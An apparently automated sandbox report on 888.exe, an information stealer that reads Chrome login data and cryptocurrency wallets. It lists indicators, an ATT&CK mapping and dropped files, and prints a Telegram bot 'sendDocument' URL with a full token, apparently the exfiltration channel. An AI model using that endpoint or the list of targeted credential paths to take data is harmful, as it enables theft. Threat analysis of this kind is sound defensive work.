Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\Login Data
Source: C:\Users\user\Desktop\888.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\Login Data
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior

              Remote Access Functionality

Source: Yara match | File source: 888.exe, type: SAMPLE
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 0.2.888.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.888.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1849050689.000000000131F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 888.exe PID: 7888, type: MEMORYSTR
ATT&CK matrix, one line per tactic (a number in front of a technique name is the per-technique counter shown in the report's matrix):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 31 Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 11 Process Injection; 1 DLL Side-Loading; 1 File Deletion; Compile After Delivery; Indicator Removal from Tools
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 System Time Discovery; 31 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; 1 File and Directory Discovery; 23 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; 2 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Web Service; 11 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label
888.exe | 53% | ReversingLabs | Win32.Trojan.Barys
888.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
http://www.w3.or | 0% | Avira URL Cloud | safe
https://cdn.ipwhois.io/flags/us.svg | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ipwho.is | 108.181.61.49 | true | false | | high
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.dr | false | | high
https://duckduckgo.com/chrome_newtab | 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.dr | false | | high
http://ipwho.is/?output=json | 888.exe, 00000000.00000002.1849949792.0000000001034000.00000004.00000010.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.dr | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.dr | false | | high
https://api.telegram.org/bot6144496200:AAG-IIb4TPBPT1INBnZWa7iLZBVaG67I2mE/sendDocument?chat_id=-100 | 888.exe, 00000000.00000002.1851135318.000000000448C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.dr | false | | high
http://ipwho.is/?output=jsonB | 888.exe, 00000000.00000002.1849949792.0000000001034000.00000004.00000010.00020000.00000000.sdmp | false | | high
https://docs.rs/getrandom#nodejs-es-module-support0 | 888.exe | false | | high
https://docs.rs/getrandom#nodejs-es-module-support | 888.exe | false | | high
http://www.w3.or | 888.exe | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.dr | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.dr | false | | high
http://ns.adobe. | 888.exe | false | | high
https://www.ecosia.org/newtab/ | 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.dr | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.dr | false | | high
https://cdn.ipwhois.io/flags/us.svg | 888.exe, 00000000.00000003.1849050689.000000000131F000.00000004.00000020.00020000.00000000.sdmp, 888.exe, 00000000.00000002.1850227693.000000000131F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
108.181.61.49 | ipwho.is | Canada | 852 | ASN852CA | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1574586
Start date and time: 2024-12-13 12:39:20 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 46s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 888.exe
Detection: MAL
Classification: mal80.troj.spyw.winEXE@4/15@3/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: 888.exe
Time | Type | Description
06:40:55 | API Interceptor | 3x Sleep call for process: powershell.exe modified
Context (IPs): Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220:
  https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.com | malicious | HTMLPhisher |
  XClient.exe | malicious | XWorm |
  file.exe | malicious | Discord Token Stealer, Millenuim RAT |
  Ziraat Bankasi Swift Mesaji.exe | malicious | MassLogger RAT |
  installer.exe | malicious | Unknown |
  installer.exe | malicious | Unknown |
  file.exe | malicious | Unknown |
  file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar |
  file.exe | malicious | Unknown |
  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger |
108.181.61.49:
  Cracker.exe | malicious | Luca Stealer | /?output=json

Context (Domains): Match | Associated Sample Name / URL | Detection | Threat Name | Context
s-part-0035.t-0009.t-msedge.net:
  payload-c17f7df6-cf80-43d5-8c60-eca90366debb.exe | malicious | Metasploit | 13.107.246.63
  Client.exe | malicious | Njrat | 13.107.246.63
  beacon_x64.exe | malicious | CobaltStrike | 13.107.246.63
  BWCStartMSI.exe | malicious | Unknown | 13.107.246.63
  kiyan.exe | malicious | RedLine | 13.107.246.63
  AsyncClient.exe | malicious | AsyncRAT | 13.107.246.63
  main.exe | malicious | AsyncRAT | 13.107.246.63
  RMX.exe | malicious | Remcos | 13.107.246.63
  https://e.trustifi.com/#/fff2a6/34074b/38c75f/bf3fbd/0d1c47/12c665/f3cdcd/c1be48/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/d08b7b/9066d9/86c9f0/b1ff53/224fc1/c5dff5/a64e02/f00a15/3cdbea/a78615/4ddb76/30d9f7/98e1a2/9412cb/8e2651/8d4e63/9d313b/2f0213/ae3252/642e4a/6f0b2e/306b49/fd8e03/84bfef/0da4e6/6224c1/902b5e/e0d84c/badeba/3e52c1/94282a/975221/7a2e92/514659/ae5bab/957b7b/eb9e61/6942c6/d917d9/44a5ae/e58297/02048a/55f177/dca75c/c46e68/ac781c/5b787b/abcd53/568132/1d514a/5290de/d0b524/7d0cb6/e4e8bf/2ff215/1ddb69/add914/7674bb/dc5d9b/8fc829/561052/f5a816/40ee64/a0bcf5/b0cc13/8e70a5/255ef2/b24b8d/81e09f/4c70dd/5bbaa4/7ff26c/f1999b/4a2515/4a3a04/0a188e | malicious | Unknown | 13.107.246.63
  41a1111.hta.exe | malicious | Unknown | 13.107.246.63
api.telegram.org:
  https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.com | malicious | HTMLPhisher | 149.154.167.220
  XClient.exe | malicious | XWorm | 149.154.167.220
  file.exe | malicious | Discord Token Stealer, Millenuim RAT | 149.154.167.220
  Ziraat Bankasi Swift Mesaji.exe | malicious | MassLogger RAT | 149.154.167.220
  installer.exe | malicious | Unknown | 149.154.167.220
  installer.exe | malicious | Unknown | 149.154.167.220
  file.exe | malicious | Unknown | 149.154.167.220
  file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar | 149.154.167.220
  file.exe | malicious | Unknown | 149.154.167.220
  TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
ipwho.is:
  https://aggttt.z4.web.core.windows.net/?bcda=00-1-234-294-2156 | malicious | TechSupportScam | 108.181.61.49
  Loader.exe | malicious | Quasar | 108.181.61.49
  Hydra.ccLoader.bat | malicious | Unknown | 108.181.61.49
  full.exe | malicious | Quasar | 108.181.61.49
  https://gvvc18-secondary.z15.web.core.windows.net/werrx01USAHTML/?bcda=1-844-439-9938 | malicious | TechSupportScam | 108.181.61.49
  file.exe | malicious | Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWorm | 103.126.138.87
  TeudA4phjN.exe | malicious | Quasar | 103.126.138.87
  http://www.sbh.co.uk/ | malicious | HTMLPhisher, TechSupportScam | 103.126.138.87
  file.exe | malicious | Quasar | 103.126.138.87
  file.exe | malicious | Quasar | 103.126.138.87

Context (ASNs): Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU:
  https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.com | malicious | HTMLPhisher | 149.154.167.220
  XClient.exe | malicious | XWorm | 149.154.167.220
  file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | 149.154.167.99
  file.exe | malicious | Discord Token Stealer, Millenuim RAT | 149.154.167.220
  file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig | 149.154.167.99
  file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | 149.154.167.99
  Ziraat Bankasi Swift Mesaji.exe | malicious | MassLogger RAT | 149.154.167.220
  file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 149.154.167.99
  installer.exe | malicious | Unknown | 149.154.167.220
  installer.exe | malicious | Unknown | 149.154.167.220
ASN852CA:
  https://aggttt.z4.web.core.windows.net/?bcda=00-1-234-294-2156 | malicious | TechSupportScam | 108.181.61.49
  Loader.exe | malicious | Quasar | 108.181.61.49
  arm7.nn-20241213-0355.elf | malicious | Mirai, Okiru | 50.98.219.123
  Hydra.ccLoader.bat | malicious | Unknown | 108.181.61.49
  full.exe | malicious | Quasar | 108.181.61.49
  jew.sh4.elf | malicious | Unknown | 75.158.230.151
  mpsl.elf | malicious | Mirai | 198.166.177.229
  mips.elf | malicious | Mirai | 142.41.252.248
  https://gvvc18-secondary.z15.web.core.windows.net/werrx01USAHTML/?bcda=1-844-439-9938 | malicious | TechSupportScam | 108.181.61.49
  PO2412010.exe | malicious | FormBook | 108.181.189.7

Context (JA3 fingerprints): Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e:
  https://opof.utackhepr.com/WE76L1u/ | malicious | Unknown | 149.154.167.220
  taskhost.exe | malicious | XWorm | 149.154.167.220
  XClient.exe | malicious | XWorm | 149.154.167.220
  Loader.exe | malicious | Quasar | 149.154.167.220
  smb.ps1 | malicious | Xmrig | 149.154.167.220
  j87MOFviv4.lnk | malicious | Unknown | 149.154.167.220
  DvGZE4FU02.lnk | malicious | Unknown | 149.154.167.220
  j3z5kxxt52.lnk | malicious | Unknown | 149.154.167.220
  zpbiw0htk6.lnk | malicious | Unknown | 149.154.167.220
  Uniswap Sniper Bot With GUI.exe | malicious | Unknown | 149.154.167.220
                                                                      No context
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):1.1510207563435464
                                                                      Encrypted:false
                                                                      SSDEEP:3:NlllulPki/llllZ:NllUcylll
                                                                      MD5:D8D47FD6FA3E199E4AFF68B91F1D04A8
                                                                      SHA1:788625E414B030E5174C5BE7262A4C93502C2C21
                                                                      SHA-256:2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
                                                                      SHA-512:5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:@...e.................................^..............@..........
                                                                      Process:C:\Users\user\Desktop\888.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                      Category:dropped
                                                                      Size (bytes):20480
                                                                      Entropy (8bit):0.8517407251719497
                                                                      Encrypted:false
                                                                      SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO4wxeHChWEE1:TeAFawNLopFgU10XJBOaT3
                                                                      MD5:D0962B221779A756754334848DCFF184
                                                                      SHA1:22CD3B9D687216E6921553F55958449CE7ABF05D
                                                                      SHA-256:7BA5110096912E6B352060FFF79B07EA95CA114A13D3994D7814831DFAA649B8
                                                                      SHA-512:05AFC25BA53913F0685075B6EC27A2A416168CB7A6D5C869D2F3DBA06AAD88633F1A709DD51AA1EDC946FF74E6271D9D3A5652FE4E0B8F226A452FDF6BAED36F
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\888.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1368932887859682
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/k4:MnlyfnGtxnfVuSVumEHFs4
                                                                      MD5:9A534FD57BED1D3E9815232E05CCF696
                                                                      SHA1:916474D7D073A4EB52A2EF8F7D9EF9549C0808A1
                                                                      SHA-256:7BB87D8BC8D49EECAB122B7F5BCD9E77F77B36C6DB173CB41E83A2CCA3AC391B
                                                                      SHA-512:ADE77FBBDE6882EF458A43F301AD84B12B42D82E222FC647A78E5709554754714DB886523A639C78D05BC221D608F0F99266D89165E78F76B21083002BE8AEFF
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\888.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):159744
                                                                      Entropy (8bit):0.5394293526345721
                                                                      Encrypted:false
                                                                      SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                      MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                      SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                      SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                      SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\888.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):40960
                                                                      Entropy (8bit):0.8553638852307782
                                                                      Encrypted:false
                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\888.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):286
                                                                      Entropy (8bit):5.814660491850138
                                                                      Encrypted:false
                                                                      SSDEEP:6:PkU6WJ2bxbyvcKGWMNjIqbu1YIqyRHXmagzyCAuiDOq0pxjbH:cU90bI7BQu1YIqimlFtqOTxjL
                                                                      MD5:0F9F816FA9E25BDCE7FD93ED917E57D5
                                                                      SHA1:498B69ACAAA3D4E91CDA7C8259DDC8BD0103EC3D
                                                                      SHA-256:05A6719FD72A40BCB9EC7F61375FF69E65B147460ABB18EBE4DDD5A224CF2776
                                                                      SHA-512:790AAE9F59C09C3111FB71597807C92DD78408278A8CD47A640B117D86BA6D4B9E18414CF3D8E9A23756CBF63B84AC17DA1305D5C92866F7A8A7F7E27867DC5F
                                                                      Malicious:false
                                                                      Preview:.google.com.false./.true.13343565070843817.1P_JAR.2023-10-05-09...google.com.true./.true.13356784270843860.NID.511=lfE2Vn6ILT7VijDzEeQ7E2-WcCFI3koiTt40Tat-ZoveQCzLQNIH_rXzfWB54vEWybmaNRxITXOcCnjhl2RsSuhlZev-zYHRHJAkTOSXgQ4rpQpZHRrNCKlp2Q4N2yfvnVbdmOY5S4gOBWPvZrZOiPLdLoEjpjyr1IKWdaFiwQo
                                                                      Process:C:\Users\user\Desktop\888.exe
                                                                      File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                      Category:dropped
                                                                      Size (bytes):870214
                                                                      Entropy (8bit):7.513770474173408
                                                                      Encrypted:false
                                                                      SSDEEP:12288:rcVRUkGAeVI4BoyfLgJKWa5ImQpS803G4Cq5YK8yUenanQnAO3phYizPK2:YVzlEBBeJ55A802Nmn4Qnz3Rm2
                                                                      MD5:AAB90E2AA6E8815DC0FEEEE8F12B266D
                                                                      SHA1:5896D173285EA2741D6D066017385E31D2C8A13B
                                                                      SHA-256:FFCDAB457081F79D01E70D7D216A82E301369C77DA0882B5E4C573ABB9D0A445
                                                                      SHA-512:2BC6D30DBF374EFF67AB385EA9518437A3D1462AC3D9C97E0475B8C4880C0755A0706AA8AD254DC04C01C713AC35080774742A09DA154E75C4EAB4EB40ADC24B
                                                                      Malicious:false
                                                                      Preview:.PNG........IHDR................C..G.IDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6...".....I)..H""..L.$a..I.d&...$.R..m$!..d&..$$.....~...@)..`.&."...d..T..Ak.Z+.V.i...m.i"3). .....q..@...Mf..H"".L2..D...U2..D...m.q$....&.If.../"..$.2...6..$.(".Df..H....8.d&..@f.PJ.6..`...O..Af.0M.}.Ske.^s?..D....@D....IHB..If...R....ls?.R.Dk........d&...... "h.1...m2..IB..
                                                                      Process:C:\Users\user\Desktop\888.exe
                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                      Category:dropped
                                                                      Size (bytes):14988
                                                                      Entropy (8bit):7.828470268563519
                                                                      Encrypted:false
                                                                      SSDEEP:192:6ILU6hBR67urKjClKjCAk8tkC9NILU6hBR67urKjClKjCAk8tkC97yKMz:6MU6WwZlZA9ttNMU6WwZlZA9ttuKMz
                                                                      MD5:49EEE1B280B8CA46420AFCBD63FE54C5
                                                                      SHA1:35CFF1BF5800749EFC0CF3D7F41F43A5C966829B
                                                                      SHA-256:FAB8FE67CF10B87B2E9005E77F87CD32519C7D54B897BD4EB04BF6B3813E762B
                                                                      SHA-512:7DD0FD623178EB1ACDFFC7A8A6656E462103F6A363F052F30672E69BBE38113505F8D84067968BA04ABBF9C225D3C49E9009812E8BF9B3B2AEE188375760F971
                                                                      Malicious:false
                                                                      Preview:PK........Hk.Y..+.............BNAGMGSPLO.pdf..I.E!......gEP..p..|7....,../^*r.._[....B.....wr.9n~$|.*.r.\.[&....J..$c..u..@..e.(g..N[..Sko..:...B..T...cz.>:a'.....y..MXW.y...N...(%$.W.....U.x.0.........Yf.[.-..@j.A;.a$a51Gw.].0.n.....q.a..L(X!..wF....E..........l.Ci.!...V....eZ..In..%.%..."}E...+cu.s#.V..qPsa..EDy|.......*..p.]..l&.TR..:|....v..>[...TV.j..|.M...e0....;Y..%.w...d.T.{.U.&...vU.q)S.HdG.....6...R....VE...&P.N....e ....bq_j*.#d..}..l.yF........4E.N..Y.O.6D....|.....v..6j.1>.O...X..W.9x.z....EO.#...i.*_T.Kq....t.../9J........F..u..v..`..v..H.w.|v.4N....^...A.zY4....;7..k|....a...N.....k.W..CeMgQ.~..f....8z...h...'.....n.....q.!.)....PK........Hk.Y.y>............EEGWXUHVUG.png...q@!.C.IQ.........&g.0z......R.|...[P....G..|>..[(n.<....S6c*L......t..:.I2lZ.Y..a..|.Y..5,.T........3.z...{...z..gm;..v.(FQX.AP..../.V..L..G...R......Y,2H...k\.T..K.;...!l.....:..M!X...N.x..>.k.m..!..6..."FK./..<6@gjq`..O.W...cK.Tc.B.|F..x........
                                                                      Process:C:\Users\user\Desktop\888.exe
                                                                      File Type:Unicode text, UTF-8 text, with CRLF, CR, LF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):712
                                                                      Entropy (8bit):5.33064589888181
                                                                      Encrypted:false
                                                                      SSDEEP:12:eM3lxmRQN3oi238Q8h0x6YFArJFJNlQM7NlVPBQM3aWflIHdAMij01mMXaBLgSEW:eQNNYv38z0xVFKUM7NlVPe8lOAMijUm9
                                                                      MD5:B7BC07CE4B1B6BFBCE0AE032C761B0E2
                                                                      SHA1:963095D221A75CF310A92932097CC416AB309EDA
                                                                      SHA-256:06C5F8313883B432BE9AA20F6BBFD2358CA814FE284EC52D1A9FE1E26DE8B235
                                                                      SHA-512:70D061F51968ABBFCF55CEA9D8A2FE0F6BE05BEFB289A7551DDAC1923E63838344CA598A32E47B93FA7FFCAD65077A25BE72E5277CAF46290EE34C5CFAEE9F0D
                                                                      Malicious:false
                                                                      Preview:..- IP Info -....IP: 8.46.123.189..Country: United States..City: New York..Postal: 10000..ISP: Level - A3356..Timezone: -05:00....- PC Info -....Username: user..OS: Microsoft Windows 10 Pro..CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..GPU: PGFKD3 (1280, 1024)..HWID: 5146949416814903..Current Language: English (United States)..FileLocation: C:\Users\user\Desktop\888.exe..Is Elevated: true....- Other Info -....Antivirus: .. - Windows Defender....- Log Info -.....Build:_____....Passwords: ....Cookies: . 2...Wallets: ....Files: . 20...Credit Cards: ....Servers FTP/SSH: ....Discord Tokens: ....Telegram: .......Tagged URLs: ....Tagged Cookies: .......Tags Passwords: .....Tags Cookies:
                                                                      Process:C:\Users\user\Desktop\888.exe
